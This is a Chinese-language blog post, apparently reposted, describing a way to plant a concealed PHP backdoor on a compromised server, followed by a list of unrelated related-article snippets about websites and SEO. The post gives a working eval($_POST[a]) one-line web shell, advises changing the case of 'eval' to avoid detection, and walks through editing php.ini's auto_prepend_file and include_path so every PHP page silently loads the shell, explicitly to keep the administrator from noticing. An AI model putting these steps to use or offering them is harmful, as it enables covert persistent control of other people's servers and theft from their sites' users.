网站php.ini,利用php.ini的另类后门

news/2024/5/21 22:58:33/文章来源:https://blog.csdn.net/weixin_42284052/article/details/115695161

最近在看完了一个程序的代码后又重新温习了PHP中文手册, 在看的过程中突然想到了一个隐藏后门的方法,拿来给大家分享下 嘿嘿:) 在入侵服务器后如何能将后门做到不被管理员大叔发现这是很重要的。因此就出现了各种隐藏的方法,对于php来说大多是插入<?eval ($ _POST[a]);? >或者include()函数隐藏然后修改文件时间等等。网上多的很我就不在这罗嗦了。

测试环境:Apache/2.0.49 (Win32) PHP/4.3.1+Winxp sp2

在我们取得一个服务器的最高权限后我们可以通过修改服务器的配置文件php.ini来达到我们隐藏后门的目的。修改系统目录下面的php.ini文件。在php.ini文件第395-397和第420-424一段

图1 图2

096834ec8202149dae4514a95dcbef4c.png

d00655c4e82a09ff6763d687208d966a.png

根据手册中关于auto_prepend_file和auto_append_file数据处理配置选项可以看出默认条件下是为空的null 而且是e文解释为Automatically add files before or after any PHP document.不用我翻译了吧。如果我们将eval()函数的后门配置到php.ini文件里那么网站上所有的PHP文件将都会被include我们的后门。嘿嘿 当然是不可见的只是在解析的时候才include,当然管理员大叔也是发现不了的。因为后门已经隐藏看都看不到。

经过测试发现我们需要修改的php.ini配置文件的2个地方。如图3 图4

497b24a055637408aaf742a777aa49f8.png

c34da7d901cc766fd7b27c8fb228b045.png

第1步:

在图3中修改设置添加我们eval()函数的后门的文件名,后门文件的名字一定要特别不能用index.php或者 config.php等网站上可能用到的文件名。可以都添上也可以添一个。在此建议后门文件就用<?eVal ($_POST[a]);?> 最好将eval()函数大小写变化下。

第2步:

看是什么系统如果是win那么就修改423-424 在此一定要注意

默认的配置几乎和php自带的没有任何改动

include_path = “.;c:\php\includes” 前面的 “.”代表/目录 而”;”后面的目录代表Automatically add files所有include文件的目录 。因此我们要配置隐藏后门要修改为

include_path = “d:\php\sapi;.” 我们所要include的文件目录放在根目录的前边。不然的话apache会在根目录下搜索我们的后门(当然是没有了从而导致服务器解析php文件失败),作为配置文件当然要把include_path前面的”;”去掉才能生效。然后重起服务就可以了。下面看看我们隐藏的后门运行的情况 图5

e5c8f9a24c055467ea67bac124a3b4f5.png

真是杀人于无形啊 所有服务器网站下面的php文件都可以被我们当作后门哦 嘿嘿 ! 关于其他环境的测试 在iis5.0 6.0测试通过。根据我个人看法只要服务器支持php解析此法应该都可以测试成功。

后记:

关于利用php.ini配置文件来做后门当然也可以用来做点其他的东西,比如:include的文件中如果是一个网页木马的网站呢或者是我们可以写一个严格过滤恶意用户提交的非法字符等等。就看你怎么用了 好了就到这吧.

本文作者lis0 转自黑面小窝 由网络安全(www.91ri.org) 收集整理.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_826917.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

html网站实现站内搜索功能_如何快速搭建站内搜索,站内搜索常见问题与解答 - 站内搜索系列...

今天我们一起来看一个app站内搜索搭建与优化的案例。某兼职招聘app&#xff0c;公司已有些体量&#xff0c;但搜索后台还一直使用MySQL搜索。数据量和日活到目前这个量级&#xff0c;站内搜索已经成为整个业务的瓶颈。在后台统计的无结果搜索词中&#xff0c;我们可以观察到&am…

成功案例_营销型网站成功案例 营销型网络

我总结了多年的网络营销推广方法&#xff0c;现在决定把这些干货技术免费分享给大家&#xff0c;大家一起交个朋友&#xff0c;一起进步共同成长。营销型网站成功案例 营销型网络 它必须是一款成功的在线游戏&#xff0c;一种具有玩家凝聚力的游戏。1“ FF14”。当版本0关闭…

我记录网站综合系统 -- 技术原理解析[0:简介(代序) 1.7Beta源代码下载开始]...

看到了路过秋天的博客系统受到了大家的好评&#xff0c;我也来介绍一个好的开源的CMS系统。我记录网站综合系统 是 掷鸡蛋者 的作品&#xff0c;这个家伙将大量的时间和精力放在这个项目上了&#xff0c;可以算一个创业项目。对于这样的同志&#xff0c;我只有敬佩他和全力支持…

30个免费下载高质量精美照片素材的网站

在设计中使用免费的照片素材可以节省大量的时间。网络有有很多分享照片资源的网站&#xff0c;有些是免费的&#xff0c;有些则需要付费&#xff0c;当你在设计中使用网上的照片素材的时候要注意使用协议以免带来麻烦。今天这篇文章向大家推荐30个国外的免费下载高质量精美图片…

自我感觉不错的五个响应式网站设计工具

2019独角兽企业重金招聘Python工程师标准>>> 响应式Web设计(Responsive Web Design)是2013年最流行的界面设计趋势之一。那么你知道有哪些好用的支持响应式设计的工具吗&#xff1f;下面推荐5个用起来不错的响应式Web设计工具&#xff0c;希望你能喜欢&#xff1a; …

今天发现的一些优秀的资源网站

为什么80%的码农都做不了架构师&#xff1f;>>> http://www.trinea.cn 一些开源项目 http://www.trinea.cn/android/android-open-source-projects-view/ android的一些工具 https://github.com/Trinea/android-common 转载于:https://my.oschina.net/quanke/blog/…

开源网站统计程序 oracle,开源网站访问统计系统Piwik

Piwik是一个PHP和MySQL的开放源代码的Web统计软件. 它给你一些关于你的网站的实用统计报告&#xff0c;比如网页浏览人数, 访问最多的页面,搜索引擎关键词等等…Piwik拥有众多不同功能的插件&#xff0c;你可以添加新的功能或是移除你不需要的功能&#xff0c;Piwik同样可以安装…

织梦之路——织梦自由列表页分页链接绝对路径化(SEO)

回家半个月&#xff0c;回来思路全无&#xff0c;看来IT工作者禁不起安逸啊~~~~ 先看看哪里需要完善的吧&#xff0c;于是先看了自由列表页的分页链接——相当不爽&#xff01;&#xff01; 都是相对路径&#xff0c;“据说”对SEO不利&#xff0c;于是改&#xff01;&#xff…

让Safari中收藏的个人网站显示Logo

让Safari中收藏的个人网站显示Logo touch-icon Safari中要显示网站的Logo需要特意设置一下&#xff0c;并不是通常的写法&#xff1a; <link rel"shortcut icon" type"image/png" href"pics/favicon.png">而是有它自己的一套写法&#x…

当SaveBinaryDirect遇到网站配额模版

根据某个“众所周知”的原因&#xff0c;当我们使用SharePoint的CSOM&#xff08;客户端对象模型&#xff09;上载文件的时候&#xff0c;推荐使用SaveBinaryDirect取代FileCollection.Add的方法&#xff08;详细原因可以参考&#xff1a;Uploading files using Client Object …

博客 笔记 网站小计

为什么80%的码农都做不了架构师&#xff1f;>>> FarBox 理念不错……可服务器在国外…… LeaNote 个人备案的 哪天成公司了再说吧…… 不过开源的程序还不错……GoMongoDB…… Github、GitCafe都有Pages服务。可惜GitCafe容量太小……但是毕竟是国内的…… paperwo…

关于meta: description HTML 标签的解释 ,SEO

关于meta: description HTML 标签的解释 &#xff0c;SEO 参阅链接 Meta Description 了解一下 meta: description <meta namedescription content"Kyle 自己的个人站点&#xff0c;存放一些自己的项目和好用的 web 小工具"><head> 标签中的 meta: desc…

关注电子商务网站开发-《简单易用的JQUERY插件--图片延时加载插件(lazyload)》

图片延时加载(lazyload)是网站常用的一种手段&#xff0c;目的是为了减少页面加载时向服务器的请求数&#xff0c;这里分享一款支持大部分情况下&#xff08;如IPAD浏览、异步加载、某个范围加载&#xff09;的图片延时加载插件。 代码及效果 先贴代码&#xff1a; $.extend({i…

易维信(EVTrust)支招五大技巧识别钓鱼网站

网上购物和网上银行凭借其便捷性和通达性&#xff0c;在互联网上日渐流行。在互联网上&#xff0c;你可以随时进行转账汇款或进行交易。据艾瑞咨询发布《2008&#xff0d;2009年中国网上支付行业发展报告》显示&#xff1a;中国互联网支付市场交易规模2008年同比增长181%&#…

前端开发人员需要具备哪些SEO优化技巧

前端开发工程师不仅需要要跟视觉设计师、交互式设计师配合&#xff0c;完美还原设计图稿&#xff0c;编写兼容各大浏览器、加载速度快、用户体验好的页面。现在还需要跟SEO人员配合&#xff0c;调整页面的代码结构和标签。一些成熟的平台&#xff0c;在开发初期并没有考虑优化问…

《流量的秘密: Google Analytics网站分析与优化技巧(第3版)》一1.7 网站分析在企业中的位置...

本节书摘来自异步社区《流量的秘密: Google Analytics网站分析与优化技巧(第3版)》一书中的第1章&#xff0c;第1.7节&#xff0c;作者【英】Brian Clifton&#xff0c;更多章节内容可以访问云栖社区“异步社区”公众号查看 1.7 网站分析在企业中的位置 流量的秘密: Google Ana…

使用Brotli提高网站访问速度

使用Brotli提高网站访问速度 在优化网站打开速度上&#xff0c;我们有很多的方法&#xff0c;而其中一个就是减少诸如Javascript和CSS等资源文件的大小&#xff0c;而减少文件大小的方法除了在代码上下功夫外&#xff0c;最常用的方法就是使用压缩算法对文件进行压缩。 目前&am…

网站字体渲染过程

前言 我们知道同一种字体在不同浏览器上的表现有可能是不同的&#xff0c;除了浏览器&#xff0c;还有哪些导致表现不同的因素呢&#xff1f;不同系统下字形的渲染也是不一样的&#xff0c;根本原因是什么呢&#xff1f;我们希望各浏览器下字体排版一致&#xff0c;实现的话有完…

如何提升网站权重

2019独角兽企业重金招聘Python工程师标准>>> 如何提升网站权重 1、 在权重高的论坛发帖 就是在高权重的论坛里面发帖&#xff0c;发帖的时分要在帖子中参加关键词和链接地址&#xff0c;当你的帖子发送胜利后&#xff0c;由于你发布的论坛权重很高。所以会直接影响到…

技术网站 -- centos

2019独角兽企业重金招聘Python工程师标准>>> centos中文站 http://www.centoscn.com/ 转载于:https://my.oschina.net/u/2312022/blog/648410